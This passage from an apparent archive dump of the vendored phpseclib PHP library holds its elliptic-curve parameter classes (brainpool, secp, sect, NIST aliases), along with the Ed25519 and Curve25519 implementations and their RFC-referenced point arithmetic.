BigInteger( '7DDE385D566332ECC0EABFA9CF7822FDF209F70024A57B1AA000C55B881F8111B2DCDE494A5' . 'F485E5BCA4BD88A2763AED1CA2B2FA8F0540678CD1E0F3AD80892', 16 ) ); $this->setOrder(new BigInteger( 'AADD9DB8DBE9C48B3FD4E6AE33C9FC07CB308DB3B3C9D20ED6639CCA70330870553E5C414CA' . '92619418661197FAC10471DB1D381085DDADDB58796829CA90069', 16 )); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/brainpoolP160t1.php000064400000003353147600400120024126 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Prime; use phpseclib3\Math\BigInteger; class brainpoolP160t1 extends Prime { public function __construct() { $this->setModulo(new BigInteger('E95E4A5F737059DC60DFC7AD95B3D8139515620F', 16)); $this->setCoefficients( new BigInteger('E95E4A5F737059DC60DFC7AD95B3D8139515620C', 16), // eg. -3 new BigInteger('7A556B6DAE535B7B51ED2C4D7DAA7A0B5C55F380', 16) ); $this->setBasePoint( new BigInteger('B199B13B9B34EFC1397E64BAEB05ACC265FF2378', 16), new BigInteger('ADD6718B7C7C1961F0991B842443772152C9E0AD', 16) ); $this->setOrder(new BigInteger('E95E4A5F737059DC60DF5991D45029409E60FC09', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/sect239k1.php000064400000001760147600400120022755 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Binary; use phpseclib3\Math\BigInteger; class sect239k1 extends Binary { public function __construct() { $this->setModulo(239, 158, 0); $this->setCoefficients( '000000000000000000000000000000000000000000000000000000000000', '000000000000000000000000000000000000000000000000000000000001' ); $this->setBasePoint( '29A0B6A887A983E9730988A68727A8B2D126C44CC2CC7B2A6555193035DC', '76310804F12E549BDB011C103089E73510ACB275FC312A5DC6B76553F0CA' ); $this->setOrder(new BigInteger('2000000000000000000000000000005A79FEC67CB6E91F1C1DA800E478A5', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/nistp521.php000064400000000546147600400120022713 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; final class nistp521 extends secp521r1 { } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/nistk283.php000064400000000547147600400120022714 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; final class nistk283 extends sect283k1 { } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/secp128r2.php000064400000001770147600400120022757 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Prime; use phpseclib3\Math\BigInteger; class secp128r2 extends Prime { public function __construct() { // same as secp128r1 $this->setModulo(new BigInteger('FFFFFFFDFFFFFFFFFFFFFFFFFFFFFFFF', 16)); $this->setCoefficients( new BigInteger('D6031998D1B3BBFEBF59CC9BBFF9AEE1', 16), new BigInteger('5EEEFCA380D02919DC2C6558BB6D8A5D', 16) ); $this->setBasePoint( new BigInteger('7B6AA5D85E572983E6FB32A7CDEBC140', 16), new BigInteger('27B6916A894D3AEE7106FE805FC34B44', 16) ); $this->setOrder(new BigInteger('3FFFFFFF7FFFFFFFBE0024720613B5A3', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/sect163r2.php000064400000001630147600400120022755 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Binary; use phpseclib3\Math\BigInteger; class sect163r2 extends Binary { public function __construct() { $this->setModulo(163, 7, 6, 3, 0); $this->setCoefficients( '000000000000000000000000000000000000000001', '020A601907B8C953CA1481EB10512F78744A3205FD' ); $this->setBasePoint( '03F0EBA16286A2D57EA0991168D4994637E8343E36', '00D51FBC6C71A0094FA2CDD545B11C5C0C797324F1' ); $this->setOrder(new BigInteger('040000000000000000000292FE77E70C12A4234C33', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/prime192v2.php000064400000002075147600400120023145 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Prime; use phpseclib3\Math\BigInteger; class prime192v2 extends Prime { public function __construct() { $this->setModulo(new BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFFFFFFFFFFFF', 16)); $this->setCoefficients( new BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFFFFFFFFFFFC', 16), new BigInteger('CC22D6DFB95C6B25E49C0D6364A4E5980C393AA21668D953', 16) ); $this->setBasePoint( new BigInteger('EEA2BAE7E1497842F2DE7769CFE9C989C072AD696F48034A', 16), new BigInteger('6574D11D69B6EC7A672BB82A083DF2F2B0847DE970B2DE15', 16) ); $this->setOrder(new BigInteger('FFFFFFFFFFFFFFFFFFFFFFFE5FB1A724DC80418648D8DD31', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/secp521r1.php000064400000003745147600400120022757 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Prime; use phpseclib3\Math\BigInteger; class secp521r1 extends Prime { public function __construct() { $this->setModulo(new BigInteger('01FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF' . 'FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF' . 'FFFF', 16)); $this->setCoefficients( new BigInteger('01FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF' . 'FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF' . 'FFFC', 16), new BigInteger('0051953EB9618E1C9A1F929A21A0B68540EEA2DA725B99B315F3B8B489918EF1' . '09E156193951EC7E937B1652C0BD3BB1BF073573DF883D2C34F1EF451FD46B50' . '3F00', 16) ); $this->setBasePoint( new BigInteger('00C6858E06B70404E9CD9E3ECB662395B4429C648139053FB521F828AF606B4D' . '3DBAA14B5E77EFE75928FE1DC127A2FFA8DE3348B3C1856A429BF97E7E31C2E5' . 'BD66', 16), new BigInteger('011839296A789A3BC0045C8A5FB42C7D1BD998F54449579B446817AFBD17273E' . '662C97EE72995EF42640C550B9013FAD0761353C7086A272C24088BE94769FD1' . '6650', 16) ); $this->setOrder(new BigInteger('01FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF' . 'FFFA51868783BF2F966B7FCC0148F709A5D03BB5C9B8899C47AEBB6FB71E9138' . '6409', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/sect409k1.php000064400000002374147600400120022756 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Binary; use phpseclib3\Math\BigInteger; class sect409k1 extends Binary { public function __construct() { $this->setModulo(409, 87, 0); $this->setCoefficients( '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000', '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001' ); $this->setBasePoint( '0060F05F658F49C1AD3AB1890F7184210EFD0987E307C84C27ACCFB8F9F67CC2C460189EB5AAAA62EE222EB1B35540CFE9023746', '01E369050B7C4E42ACBA1DACBF04299C3460782F918EA427E6325165E9EA10E3DA5F6C42E9C55215AA9CA27A5863EC48D8E0286B' ); $this->setOrder(new BigInteger( '7FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE5F' . '83B2D4EA20400EC4557D5ED3E3E7CA5B4B5C83B8E01E5FCF', 16 )); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/sect163k1.php000064400000001630147600400120022745 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Binary; use phpseclib3\Math\BigInteger; class sect163k1 extends Binary { public function __construct() { $this->setModulo(163, 7, 6, 3, 0); $this->setCoefficients( '000000000000000000000000000000000000000001', '000000000000000000000000000000000000000001' ); $this->setBasePoint( '02FE13C0537BBC11ACAA07D793DE4E6D5E5C94EEE8', '0289070FB05D38FF58321F2E800536D538CCDAA3D9' ); $this->setOrder(new BigInteger('04000000000000000000020108A2E0CC0D99F8A5EF', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/prime239v2.php000064400000002205147600400120023142 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Prime; use phpseclib3\Math\BigInteger; class prime239v2 extends Prime { public function __construct() { $this->setModulo(new BigInteger('7FFFFFFFFFFFFFFFFFFFFFFF7FFFFFFFFFFF8000000000007FFFFFFFFFFF', 16)); $this->setCoefficients( new BigInteger('7FFFFFFFFFFFFFFFFFFFFFFF7FFFFFFFFFFF8000000000007FFFFFFFFFFC', 16), new BigInteger('617FAB6832576CBBFED50D99F0249C3FEE58B94BA0038C7AE84C8C832F2C', 16) ); $this->setBasePoint( new BigInteger('38AF09D98727705120C921BB5E9E26296A3CDCF2F35757A0EAFD87B830E7', 16), new BigInteger('5B0125E4DBEA0EC7206DA0FC01D9B081329FB555DE6EF460237DFF8BE4BA', 16) ); $this->setOrder(new BigInteger('7FFFFFFFFFFFFFFFFFFFFFFF800000CFA7E8594377D414C03821BC582063', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/sect283k1.php000064400000002061147600400120022747 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Binary; use phpseclib3\Math\BigInteger; class sect283k1 extends Binary { public function __construct() { $this->setModulo(283, 12, 7, 5, 0); $this->setCoefficients( '000000000000000000000000000000000000000000000000000000000000000000000000', '000000000000000000000000000000000000000000000000000000000000000000000001' ); $this->setBasePoint( '0503213F78CA44883F1A3B8162F188E553CD265F23C1567A16876913B0C2AC2458492836', '01CCDA380F1C9E318D90F95D07E5426FE87E45C0E8184698E45962364E34116177DD2259' ); $this->setOrder(new BigInteger('01FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE9AE2ED07577265DFF7F94451E061E163C61', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/secp160r1.php000064400000002015147600400120022743 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Prime; use phpseclib3\Math\BigInteger; class secp160r1 extends Prime { public function __construct() { $this->setModulo(new BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF7FFFFFFF', 16)); $this->setCoefficients( new BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF7FFFFFFC', 16), new BigInteger('1C97BEFC54BD7A8B65ACF89F81D4D4ADC565FA45', 16) ); $this->setBasePoint( new BigInteger('4A96B5688EF573284664698968C38BB913CBFC82', 16), new BigInteger('23A628553168947D59DCC912042351377AC5FB32', 16) ); $this->setOrder(new BigInteger('0100000000000000000001F4C8F927AED3CA752257', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/secp256k1.php000064400000003501147600400120022743 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; //use phpseclib3\Crypt\EC\BaseCurves\Prime; use phpseclib3\Crypt\EC\BaseCurves\KoblitzPrime; use phpseclib3\Math\BigInteger; //class secp256k1 extends Prime class secp256k1 extends KoblitzPrime { public function __construct() { $this->setModulo(new BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFC2F', 16)); $this->setCoefficients( new BigInteger('0000000000000000000000000000000000000000000000000000000000000000', 16), new BigInteger('0000000000000000000000000000000000000000000000000000000000000007', 16) ); $this->setOrder(new BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141', 16)); $this->setBasePoint( new BigInteger('79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798', 16), new BigInteger('483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8', 16) ); $this->basis = []; $this->basis[] = [ 'a' => new BigInteger('3086D221A7D46BCDE86C90E49284EB15', -16), 'b' => new BigInteger('FF1BBC8129FEF177D790AB8056F5401B3D', -16) ]; $this->basis[] = [ 'a' => new BigInteger('114CA50F7A8E2F3F657C1108D9D44CFD8', -16), 'b' => new BigInteger('3086D221A7D46BCDE86C90E49284EB15', -16) ]; $this->beta = $this->factory->newInteger(new BigInteger('7AE96A2B657C07106E64479EAC3434E99CF0497512F58995C1396C28719501EE', -16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/secp384r1.php000064400000003127147600400120022760 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Prime; use phpseclib3\Math\BigInteger; class secp384r1 extends Prime { public function __construct() { $this->setModulo(new BigInteger( 'FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFFFF0000000000000000FFFFFFFF', 16 )); $this->setCoefficients( new BigInteger( 'FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFFFF0000000000000000FFFFFFFC', 16 ), new BigInteger( 'B3312FA7E23EE7E4988E056BE3F82D19181D9C6EFE8141120314088F5013875AC656398D8A2ED19D2A85C8EDD3EC2AEF', 16 ) ); $this->setBasePoint( new BigInteger( 'AA87CA22BE8B05378EB1C71EF320AD746E1D3B628BA79B9859F741E082542A385502F25DBF55296C3A545E3872760AB7', 16 ), new BigInteger( '3617DE4A96262C6F5D9E98BF9292DC29F8F41DBD289A147CE9DA3113B5F0B8C00A60B1CE1D7E819D7A431D7C90EA0E5F', 16 ) ); $this->setOrder(new BigInteger( 'FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFC7634D81F4372DDF581A0DB248B0A77AECEC196ACCC52973', 16 )); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/nistb409.php000064400000000546147600400120022702 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; final class nistb409 extends sect409r1 { } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/brainpoolP160r1.php000064400000002027147600400120024121 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Prime; use phpseclib3\Math\BigInteger; class brainpoolP160r1 extends Prime { public function __construct() { $this->setModulo(new BigInteger('E95E4A5F737059DC60DFC7AD95B3D8139515620F', 16)); $this->setCoefficients( new BigInteger('340E7BE2A280EB74E2BE61BADA745D97E8F7C300', 16), new BigInteger('1E589A8595423412134FAA2DBDEC95C8D8675E58', 16) ); $this->setBasePoint( new BigInteger('BED5AF16EA3F6A4F62938C4631EB5AF7BDBCDBC3', 16), new BigInteger('1667CB477A1A8EC338F94741669C976316DA6321', 16) ); $this->setOrder(new BigInteger('E95E4A5F737059DC60DF5991D45029409E60FC09', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/brainpoolP320r1.php000064400000002740147600400120024121 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Prime; use phpseclib3\Math\BigInteger; class brainpoolP320r1 extends Prime { public function __construct() { $this->setModulo(new BigInteger('D35E472036BC4FB7E13C785ED201E065F98FCFA6F6F40DEF4F9' . '2B9EC7893EC28FCD412B1F1B32E27', 16)); $this->setCoefficients( new BigInteger('3EE30B568FBAB0F883CCEBD46D3F3BB8A2A73513F5EB79DA66190EB085FFA9F4' . '92F375A97D860EB4', 16), new BigInteger('520883949DFDBC42D3AD198640688A6FE13F41349554B49ACC31DCCD88453981' . '6F5EB4AC8FB1F1A6', 16) ); $this->setBasePoint( new BigInteger('43BD7E9AFB53D8B85289BCC48EE5BFE6F20137D10A087EB6E7871E2A10A599C7' . '10AF8D0D39E20611', 16), new BigInteger('14FDD05545EC1CC8AB4093247F77275E0743FFED117182EAA9C77877AAAC6AC7' . 'D35245D1692E8EE1', 16) ); $this->setOrder(new BigInteger('D35E472036BC4FB7E13C785ED201E065F98FCFA5B68F12A32D4' . '82EC7EE8658E98691555B44C59311', 16)); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/Ed25519.php000064400000023710147600400120022262 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards; use phpseclib3\Crypt\Hash; use phpseclib3\Crypt\Random; use phpseclib3\Math\BigInteger; class Ed25519 extends TwistedEdwards { const HASH = 'sha512'; /* Per https://tools.ietf.org/html/rfc8032#page-6 EdDSA has several parameters, one of which is b: 2. An integer b with 2^(b-1) > p. EdDSA public keys have exactly b bits, and EdDSA signatures have exactly 2*b bits. b is recommended to be a multiple of 8, so public key and signature lengths are an integral number of octets. SIZE corresponds to b */ const SIZE = 32; public function __construct() { // 2^255 - 19 $this->setModulo(new BigInteger('7FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFED', 16)); $this->setCoefficients( // -1 new BigInteger('7FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEC', 16), // a // -121665/121666 new BigInteger('52036CEE2B6FFE738CC740797779E89800700A4D4141D8AB75EB4DCA135978A3', 16) // d ); $this->setBasePoint( new BigInteger('216936D3CD6E53FEC0A4E231FDD6DC5C692CC7609525A7B2C9562D608F25D51A', 16), new BigInteger('6666666666666666666666666666666666666666666666666666666666666658', 16) ); $this->setOrder(new BigInteger('1000000000000000000000000000000014DEF9DEA2F79CD65812631A5CF5D3ED', 16)); // algorithm 14.47 from http://cacr.uwaterloo.ca/hac/about/chap14.pdf#page=16 /* $this->setReduction(function($x) { $parts = $x->bitwise_split(255); $className = $this->className; if (count($parts) > 2) { list(, $r) = $x->divide($className::$modulo); return $r; } $zero = new BigInteger(); $c = new BigInteger(19); switch (count($parts)) { case 2: list($qi, $ri) = $parts; break; case 1: $qi = $zero; list($ri) = $parts; break; case 0: return $zero; } $r = $ri; while ($qi->compare($zero) > 0) { $temp = $qi->multiply($c)->bitwise_split(255); if (count($temp) == 2) { list($qi, $ri) = $temp; } else { $qi = $zero; list($ri) = $temp; } $r = $r->add($ri); } while ($r->compare($className::$modulo) > 0) { $r = $r->subtract($className::$modulo); } return $r; }); */ } /** * Recover X from Y * * Implements steps 2-4 at https://tools.ietf.org/html/rfc8032#section-5.1.3 * * Used by EC\Keys\Common.php * * @param BigInteger $y * @param boolean $sign * @return object[] */ public function recoverX(BigInteger $y, $sign) { $y = $this->factory->newInteger($y); $y2 = $y->multiply($y); $u = $y2->subtract($this->one); $v = $this->d->multiply($y2)->add($this->one); $x2 = $u->divide($v); if ($x2->equals($this->zero)) { if ($sign) { throw new \RuntimeException('Unable to recover X coordinate (x2 = 0)'); } return clone $this->zero; } // find the square root /* we don't do $x2->squareRoot() because, quoting from https://tools.ietf.org/html/rfc8032#section-5.1.1: "For point decoding or "decompression", square roots modulo p are needed. They can be computed using the Tonelli-Shanks algorithm or the special case for p = 5 (mod 8). To find a square root of a, first compute the candidate root x = a^((p+3)/8) (mod p)." */ $exp = $this->getModulo()->add(new BigInteger(3)); $exp = $exp->bitwise_rightShift(3); $x = $x2->pow($exp); // If v x^2 = -u (mod p), set x <-- x * 2^((p-1)/4), which is a square root. if (!$x->multiply($x)->subtract($x2)->equals($this->zero)) { $temp = $this->getModulo()->subtract(new BigInteger(1)); $temp = $temp->bitwise_rightShift(2); $temp = $this->two->pow($temp); $x = $x->multiply($temp); if (!$x->multiply($x)->subtract($x2)->equals($this->zero)) { throw new \RuntimeException('Unable to recover X coordinate'); } } if ($x->isOdd() != $sign) { $x = $x->negate(); } return [$x, $y]; } /** * Extract Secret Scalar * * Implements steps 1-3 at https://tools.ietf.org/html/rfc8032#section-5.1.5 * * Used by the various key handlers * * @param string $str * @return array */ public function extractSecret($str) { if (strlen($str) != 32) { throw new \LengthException('Private Key should be 32-bytes long'); } // 1. Hash the 32-byte private key using SHA-512, storing the digest in // a 64-octet large buffer, denoted h. Only the lower 32 bytes are // used for generating the public key. $hash = new Hash('sha512'); $h = $hash->hash($str); $h = substr($h, 0, 32); // 2. Prune the buffer: The lowest three bits of the first octet are // cleared, the highest bit of the last octet is cleared, and the // second highest bit of the last octet is set. $h[0] = $h[0] & chr(0xF8); $h = strrev($h); $h[0] = ($h[0] & chr(0x3F)) | chr(0x40); // 3. Interpret the buffer as the little-endian integer, forming a // secret scalar s. $dA = new BigInteger($h, 256); return [ 'dA' => $dA, 'secret' => $str ]; } /** * Encode a point as a string * * @param array $point * @return string */ public function encodePoint($point) { list($x, $y) = $point; $y = $y->toBytes(); $y[0] = $y[0] & chr(0x7F); if ($x->isOdd()) { $y[0] = $y[0] | chr(0x80); } $y = strrev($y); return $y; } /** * Creates a random scalar multiplier * * @return \phpseclib3\Math\PrimeField\Integer */ public function createRandomMultiplier() { return $this->extractSecret(Random::string(32))['dA']; } /** * Converts an affine point to an extended homogeneous coordinate * * From https://tools.ietf.org/html/rfc8032#section-5.1.4 : * * A point (x,y) is represented in extended homogeneous coordinates (X, Y, Z, T), * with x = X/Z, y = Y/Z, x * y = T/Z. * * @return \phpseclib3\Math\PrimeField\Integer[] */ public function convertToInternal(array $p) { if (empty($p)) { return [clone $this->zero, clone $this->one, clone $this->one, clone $this->zero]; } if (isset($p[2])) { return $p; } $p[2] = clone $this->one; $p[3] = $p[0]->multiply($p[1]); return $p; } /** * Doubles a point on a curve * * @return FiniteField[] */ public function doublePoint(array $p) { if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } if (!count($p)) { return []; } if (!isset($p[2])) { throw new \RuntimeException('Affine coordinates need to be manually converted to "Jacobi" coordinates or vice versa'); } // from https://tools.ietf.org/html/rfc8032#page-12 list($x1, $y1, $z1, $t1) = $p; $a = $x1->multiply($x1); $b = $y1->multiply($y1); $c = $this->two->multiply($z1)->multiply($z1); $h = $a->add($b); $temp = $x1->add($y1); $e = $h->subtract($temp->multiply($temp)); $g = $a->subtract($b); $f = $c->add($g); $x3 = $e->multiply($f); $y3 = $g->multiply($h); $t3 = $e->multiply($h); $z3 = $f->multiply($g); return [$x3, $y3, $z3, $t3]; } /** * Adds two points on the curve * * @return FiniteField[] */ public function addPoint(array $p, array $q) { if (!isset($this->factory)) { throw new \RuntimeException('setModulo needs to be called before this method'); } if (!count($p) || !count($q)) { if (count($q)) { return $q; } if (count($p)) { return $p; } return []; } if (!isset($p[2]) || !isset($q[2])) { throw new \RuntimeException('Affine coordinates need to be manually converted to "Jacobi" coordinates or vice versa'); } if ($p[0]->equals($q[0])) { return !$p[1]->equals($q[1]) ? [] : $this->doublePoint($p); } // from https://tools.ietf.org/html/rfc8032#page-12 list($x1, $y1, $z1, $t1) = $p; list($x2, $y2, $z2, $t2) = $q; $a = $y1->subtract($x1)->multiply($y2->subtract($x2)); $b = $y1->add($x1)->multiply($y2->add($x2)); $c = $t1->multiply($this->two)->multiply($this->d)->multiply($t2); $d = $z1->multiply($this->two)->multiply($z2); $e = $b->subtract($a); $f = $d->subtract($c); $g = $d->add($c); $h = $b->add($a); $x3 = $e->multiply($f); $y3 = $g->multiply($h); $t3 = $e->multiply($h); $z3 = $f->multiply($g); return [$x3, $y3, $z3, $t3]; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/Curve25519.php000064400000004413147600400120023015 0ustar00 * @copyright 2019 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Montgomery; use phpseclib3\Math\BigInteger; class Curve25519 extends Montgomery { public function __construct() { // 2^255 - 19 $this->setModulo(new BigInteger('7FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFED', 16)); $this->a24 = $this->factory->newInteger(new BigInteger('121666')); $this->p = [$this->factory->newInteger(new BigInteger(9))]; // 2^252 + 0x14def9dea2f79cd65812631a5cf5d3ed $this->setOrder(new BigInteger('1000000000000000000000000000000014DEF9DEA2F79CD65812631A5CF5D3ED', 16)); /* $this->setCoefficients( new BigInteger('486662'), // a ); $this->setBasePoint( new BigInteger(9), new BigInteger('14781619447589544791020593568409986887264606134616475288964881837755586237401') ); */ } /** * Multiply a point on the curve by a scalar * * Modifies the scalar as described at https://tools.ietf.org/html/rfc7748#page-8 * * @return array */ public function multiplyPoint(array $p, BigInteger $d) { //$r = strrev(sodium_crypto_scalarmult($d->toBytes(), strrev($p[0]->toBytes()))); //return [$this->factory->newInteger(new BigInteger($r, 256))]; $d = $d->toBytes(); $d &= "\xF8" . str_repeat("\xFF", 30) . "\x7F"; $d = strrev($d); $d |= "\x40"; $d = new BigInteger($d, -256); return parent::multiplyPoint($p, $d); } /** * Creates a random scalar multiplier * * @return BigInteger */ public function createRandomMultiplier() { return BigInteger::random(256); } /** * Performs range check */ public function rangeCheck(BigInteger $x) { if ($x->getLength() > 256 || $x->isNegative()) { throw new \RangeException('x must be a positive integer less than 256 bytes in length'); } } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/nistp224.php000064400000000546147600400120022713 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; final class nistp224 extends secp224r1 { } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/brainpoolP512t1.php000064400000003643147600400120024131 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\Curves; use phpseclib3\Crypt\EC\BaseCurves\Prime; use phpseclib3\Math\BigInteger; class brainpoolP512t1 extends Prime { public function __construct() { $this->setModulo(new BigInteger( 'AADD9DB8DBE9C48B3FD4E6AE33C9FC07CB308DB3B3C9D20ED6639CCA703308717D4D9B009BC' . '66842AECDA12AE6A380E62881FF2F2D82C68528AA6056583A48F3', 16 )); $this->setCoefficients( new BigInteger( 'AADD9DB8DBE9C48B3FD4E6AE33C9FC07CB308DB3B3C9D20ED6639CCA703308717D4D9B009BC' . '66842AECDA12AE6A380E62881FF2F2D82C68528AA6056583A48F0', 16 ), // eg. -3 new BigInteger( '7CBBBCF9441CFAB76E1890E46884EAE321F70C0BCB4981527897504BEC3E36A62BCDFA23049' . '76540F6450085F2DAE145C22553B465763689180EA2571867423E', 16 ) ); $this->setBasePoint( new BigInteger( 